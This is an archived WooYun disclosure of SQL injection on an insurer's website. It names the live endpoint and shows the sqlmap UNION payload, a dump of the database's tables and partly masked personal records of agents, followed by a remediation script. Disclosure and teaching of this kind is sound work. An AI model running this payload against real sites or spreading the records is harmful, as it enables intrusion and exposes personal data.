WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles online ------------------------- http://drop.zone.ci/
Disclosure timeline:
2016-04-18: Details reported to the vendor; awaiting vendor response
2016-04-18: Vendor confirmed the issue; details visible to the vendor only
2016-04-28: Details disclosed to core white hats and relevant domain experts
2016-05-08: Details disclosed to regular white hats
2016-05-18: Details disclosed to intern white hats
2016-06-02: Details disclosed to the public
SQL injection in the main site of Yangtze River Insurance (扬子江保险), an HNA Group subsidiary (about 100,000 insurance agent records exposed)
Target site: http://www.yrib.com/
Injection point: http://www.yrib.com/richsafe_getNewsDetailById.action?id=10 (the id GET parameter is injectable; confirmed with sqlmap below)
Proof
sqlmap output:

---
Parameter: id (GET)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: id=10' UNION ALL SELECT NULL,CONCAT(0x7170717671,0x5061765a76757a6e5275,0x716b716b71),NULL,NULL#
---
[10:34:39] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
[10:34:39] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[10:34:39] [INFO] fetching tables for database: 'richsafe'
Database: richsafe
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| tbl_faagent             | 105693  |
| tbl_faagentpost         | 49359   |
| tbl_fdcom               | 30563   |
| tbl_fdsyslog            | 4329    |
| tbl_interfacelog        | 2705    |
| tbl_interfacelogparas   | 2705    |
| tbl_fdcounty            | 2589    |
| tbl_occupationcode      | 971     |
| tbl_fadistribution      | 889     |
| tbl_flemployerins_track | 698     |
| tbl_fmcalmodepams       | 666     |
| ldcode                  | 455     |
| tbl_fxinpersonins       | 391     |
| tbl_fcinsured           | 346     |
| tbl_fdcity              | 340     |
| tbl_foorderdetail       | 335     |
| tbl_fouserorder         | 335     |
| tbl_fcappnt             | 327     |
| tbl_fccont              | 327     |
| tbl_fcpol               | 312     |
| tbl_fcprojectplan       | 258     |
| tbl_message             | 257     |
| tbl_fcconttoplan        | 256     |
| tbl_fdmenugrptomenu     | 156     |
| tbl_easypaytype         | 154     |
| tbl_fofxotoattach       | 151     |
| tbl_dxsendrecord        | 138     |
| tbl_fdmenu              | 123     |
| tbl_fxmedicalapp_sf     | 80      |
| tbl_easypayoinfo        | 58      |
| tbl_fdplan              | 58      |
| tbl_fduserlog           | 49      |
| tbl_fdplantopro         | 48      |
| ldmenu                  | 46      |
| tbl_fdplanrisk          | 46      |
| seqmysql                | 44      |
| tbl_fmsupplier          | 40      |
| tbl_fdroletomenugrp     | 39      |
| tbl_fmproductplan       | 39      |
| tbl_fdmenugrp           | 36      |
| tbl_fmcalmode           | 35      |
| tbl_fdpriovince         | 31      |
| ldtaskrunlog            | 28      |
| tbl_dxlabelmgt          | 28      |
| tbl_roadrescue          | 21      |
| tbl_uploadinfo          | 21      |
| ldtaskplanaudit         | 18      |
| lduser                  | 16      |
| ldtaskaudit             | 14      |
| tbl_fmriskapp           | 14      |
| latestinformation       | 11      |
| tbl_fxmedicalapp_jb_sf  | 10      |
| tbl_lwuser              | 10      |
| tbl_lp_attch            | 9       |
| tbl_commentinfo         | 7       |
| tbl_dxmoduleconfig      | 7       |
| tbl_interfaceinfo       | 7       |
| tbl_interfaceinfoparas  | 7       |
| ldtask                  | 5       |
| ldtaskplan              | 5       |
| tbl_fduser              | 5       |
| companyglory            | 4       |
| tbl_fdhrcom             | 4       |
| tbl_fmproductdef        | 3       |
| tbl_ldrole              | 3       |
| `dual`                  | 2       |
| recruitmentinformation  | 2       |
| tbl_fiaccpass           | 2       |
| tbl_ficustomeracc       | 1       |
+-------------------------+---------+
Sample rows dumped from the agent table (one record per line, columns as returned by sqlmap; no column header was captured; national ID numbers, names and login names are masked here):

| 110105********0037 | NULL | NULL | 1000000014 | 1 | 胡** | NULL | 1 | NULL | NULL | NULL | NULL | 11444 | h*** | 2014-03-04 | 1965-01-14 | NULL | 001 | 17:29:03 | NULL | NULL | NULL | NULL | 2014-05-29 | 2000-12-26 | NULL | NULL | 15:44:26 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 16591 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL |
| 110102********2719 | NULL | NULL | 1000000016 | 1 | 王** | NULL | 1 | NULL | NULL | NULL | NULL | 177 | d*** | 2014-03-04 | 1944-12-02 | NULL | 001 | 13:38:14 | NULL | NULL | NULL | NULL | 2014-05-29 | 2001-06-04 | NULL | NULL | 15:44:26 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 2 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL |
| 110105********7716 | NULL | NULL | 1000000018 | 1 | 郭** | NULL | 1 | NULL | NULL | NULL | NULL | 12000 | h*** | 2014-03-04 | 1962-03-06 | NULL | 001 | 13:18:50 | NULL | NULL | NULL | NULL | 2014-05-29 | 1995-03-30 | NULL | NULL | 15:44:26 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 9 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL |
| 110101********053x | NULL | NULL | 1000000019 | 1 | 房** | NULL | 1 | NULL | NULL | NULL | NULL | 6277 | l*** | 2014-03-04 | 1964-07-01 | NULL | 001 | 11:47:16 | NULL | NULL | NULL | NULL | 2014-08-11 | 1995-04-01 | NULL | NULL | 16:09:29 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 6222 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL |
| 120110********037X | NULL | NULL | 1000000023 | 1 | 孟** | NULL | 1 | NULL | NULL | NULL | NULL | 11759 | q*** | 2014-03-04 | 1955-08-14 | NULL | 001 | 15:14:52 | NULL | NULL | NULL | NULL | 2014-05-29 | 1999-11-26 | NULL | NULL | 15:44:26 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 11683 | NULL | NULL | NULL
Fix recommendation: filter the input. Concretely, the id parameter should be validated as an integer and bound to the query as a parameter (a prepared statement) instead of being concatenated into the SQL text; the UNION payload above only works because a single quote in id terminates the string literal.
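As an added example (not part of the WooYun report and not the vendor's code), the following Python script models the injected endpoint against an in-memory SQLite database: it decodes the hex markers in the sqlmap payload quoted above, shows that the UNION payload leaks the marker through the concatenated query, and shows the validated, parameterized version rejecting it. The table layout, sample rows and function names are assumptions; only the payload shape is taken from the report, translated to SQLite syntax (MySQL hex literals become string literals joined with ||, and the MySQL '#' comment becomes '--').

```python
import re
import sqlite3

# The sqlmap payload quoted in the report (MySQL syntax).
MYSQL_PAYLOAD = ("10' UNION ALL SELECT NULL,"
                 "CONCAT(0x7170717671,0x5061765a76757a6e5275,0x716b716b71),NULL,NULL#")

# Same payload translated to SQLite syntax for this offline model (assumption:
# hex literals -> string literals joined with ||, '#' comment -> '--').
SQLITE_PAYLOAD = "10' UNION ALL SELECT NULL,'qpqvq'||'PavZvuznRu'||'qkqkq',NULL,NULL--"

# Constructed sample rows; the real news table layout is not shown in the report.
NEWS_ROWS = [
    (10, "Company news", "Branch office opening", None),
    (11, "Notice", "Holiday service hours", None),
]


def decode_hex_literals(payload):
    """Decode MySQL 0x... literals. sqlmap uses them so the injected marker needs
    no quote characters; the result is delimiter / random token / delimiter."""
    return [bytes.fromhex(h).decode("ascii")
            for h in re.findall(r"0x([0-9a-fA-F]+)", payload)]


def make_db():
    """In-memory stand-in for the site's database (four columns, as sqlmap found)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT, extra TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?, ?, ?)", NEWS_ROWS)
    return conn


def get_news_vulnerable(conn, raw_id):
    """Models the reported endpoint: id is spliced into the SQL text, so a single
    quote closes the literal and the rest of the value is parsed as SQL."""
    sql = "SELECT id, title, body, extra FROM news WHERE id = '%s'" % raw_id
    return conn.execute(sql).fetchall()


def get_news_fixed(conn, raw_id):
    """The fix: validate id as an integer and bind it as a parameter, so the
    driver never lets the value be interpreted as SQL."""
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        raise ValueError("id must be a decimal integer")
    sql = "SELECT id, title, body, extra FROM news WHERE id = ?"
    return conn.execute(sql, (int(raw_id),)).fetchall()


def union_marker_leaked(rows, marker_parts):
    """How sqlmap confirms a usable UNION column: the joined marker string comes
    back verbatim in the response rows."""
    marker = "".join(marker_parts)
    return any(marker in str(cell) for row in rows for cell in row if cell is not None)


if __name__ == "__main__":
    parts = decode_hex_literals(MYSQL_PAYLOAD)
    print("sqlmap marker parts:", parts)
    db = make_db()
    rows = get_news_vulnerable(db, SQLITE_PAYLOAD)
    print("vulnerable query returned", len(rows), "rows; marker leaked:",
          union_marker_leaked(rows, parts))
    try:
        get_news_fixed(db, SQLITE_PAYLOAD)
    except ValueError as exc:
        print("fixed handler rejected payload:", exc)
    print("fixed handler, legitimate id:", get_news_fixed(db, "10"))
```

The vulnerable handler returns the legitimate row plus a second row carrying the marker in the column sqlmap chose, which is exactly the signal it reports as "MySQL UNION query (NULL) - 4 columns"; the fixed handler refuses the payload before it reaches the database and, for a valid id, binds it rather than interpolating it.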
Severity: High
Vulnerability Rank: 12
Confirmed at: 2016-04-18 14:28
Vendor reply: Thank you, we will arrange remediation immediately.
Latest status: none yet